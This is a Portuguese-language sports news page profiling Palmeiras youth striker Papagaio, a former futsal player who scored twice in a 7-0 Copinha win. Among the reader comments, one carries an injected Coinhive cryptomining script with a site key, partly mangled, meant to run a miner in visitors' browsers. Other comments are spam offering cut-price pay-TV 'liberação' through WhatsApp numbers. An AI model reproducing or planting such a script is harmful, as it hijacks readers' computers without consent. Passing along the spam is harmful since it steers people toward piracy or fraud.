Ex-atleta de futsal, Papagaio ganha espaço na base do Palmeiras

15/1/2018 09:37

Ex-atleta de futsal, Papagaio ganha espaço na base do Palmeiras

Conhecido por ser falador, atacante espera ter desencantado na Copinha após goleada de domingo

Ex-atleta de futsal, Papagaio ganha espaço na base do Palmeiras

Papagaio comemora gol do Palmeiras na Copinha (Foto: Fábio Menotti/Ag. Palmeiras)



Há dois anos, Rafael Elias da Silva, conhecido como Papagaio, usava sua habilidade para falar e fazer gols na quadra de futsal. Marcava gols e ganhava títulos pelo Palmeiras, representava a seleção brasileira sub-17... Em 2017, ele recebeu um convite para atuar em um espaço maior: o campo. Não decepcionou. E a rotina de falar muito e balançar as redes continuou.







No domingo, Papagaio marcou duas vezes na goleada por 7 a 0 sobre o Taubaté pela terceira fase da Copa São Paulo de Futebol Júnior. Saindo do banco ao longo das partidas, o atacante vinha tendo boas chances, mas ainda não tinha balançado as redes. Espera, agora, ter desencantado.



– Agradeço meus companheiros pelos passes e assistências. Quem vem do banco precisa manter a intensidade do jogo. Agora saíram os gols e espero que venham mais – disse Papagaio.



Com 18 anos, Papagaio tem a velocidade e a habilidade como marcas principais. São características que herdou do futsal, onde atuava como pivô. Em 2016, por exemplo, ele foi peça fundamental no título sul-americano da Seleção brasileira sub-17, marcando seis gols. Apesar de sentir saudades do salão, ele diz já estar à vontade no campo.



– É difícil para quem vem do futsal, acostumado a jogar em 40 metros no máximo. O campo é bem maior. Me adaptei bem, estou gostando. Saudade do futsal eu sinto sempre, por ser desde pequeno que jogo – disse Papagaio, que ganhou o apelido aos cinco anos de idade, quando jogava futsal na Portuguesa; segundo um técnico, a criança não parava de falar.



Papagaio quase que teve sua carreira terminada por engano. Ele conta que, quando era mais novo, um erro médico o diagnosticou com arritmia cardíaca.



– Estava dando que era uma coisa que poderia me tirar do futebol, fiquei desesperado. Acabei indo em outro cardiologista, que o pai de um amigo meu arrumou, e os exames deram que estava tudo bem – conta o atacante.



Papagaio manteve a característica da infância: é o mais falador do elenco que tenta dar ao Palmeiras o primeiro título da Copa SP. Na terça-feira, ele e seus companheiros voltam a campo para enfrentar Vasco pelas oitavas de final.





VEJA TAMBÉM
- Rony marca gol após jejum de 11 jogos pelo Palmeiras contra Botafogo-SP.
- Abel solicita permanência de Estêvão no clube até 2027: impressões surpreendentes.
- CbF divulga áudio do VAR em decisão de gol anulado do Palmeiras.





6501 visitas - Fonte: Globo Esporte

Mais notícias do Palmeiras

Notícias de contratações do Palmeiras
Notícias mais lidas

na minha opinião será o novo Gabriel Jesus!

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

alanzinho. vocês vão ouvir falar dele

Guardem esse nome. Esse moleque bom demais.

merecido, parabens < src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Você que está pagado valores alto e teno pouco PROGRAMAÇÃO de TVV asssinatura faça liberação e DEMINUIMOS valor da conta pra qualquer luga do Brasil WHATZSAP 11958640776

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou .

Últimas notícias

publicidade
publicidade

Brasileiro

Qua - 20:00 - Arena Barueri -
X
Palmeiras
Internacional

Brasileiro

Dom - 18:30 - Manoel Barradas
0 X 1
Vitoria
Palmeiras